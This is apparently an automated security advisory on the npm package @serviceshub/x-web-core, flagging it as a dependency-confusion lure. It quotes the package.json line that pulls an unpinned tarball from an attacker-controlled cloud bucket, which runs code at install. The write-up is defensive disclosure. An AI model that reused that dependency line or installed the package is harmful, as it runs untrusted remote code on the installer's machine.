@serviceshub/x-web-core @99.9.1

Summary

Package ships a trivial index.js ( module.exports = {}; ) and exists solely to pull a direct-URL tarball dependency at install time. package.json line 9 declares "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.3.9.tgz" — an unpinned (no integrity hash, mutable bucket object) tarball hosted outside the npm registry, bypassing registry-side audit. The bucket path literally contains the string depenconf (dependency-confusion). On npm install , npm fetches the GCS tarball and runs any lifecycle scripts inside it on the installer's machine; the author can swap the tarball bytes at any time. Corroborating signals: version is squatted at 99.9.1 for a brand-new scope, description and author fields are empty, and the main module has no functionality matching the package's x-web-core name. The package itself is a lure whose only effect on install is to pull attacker-controlled, non-registry, mutable code into the installer's dependency tree.

Source: amazon-inspector (1cd81c2623e8f621801dcbfbf7d7eb8745bf702f1d5e85e410872400c7d2eea7)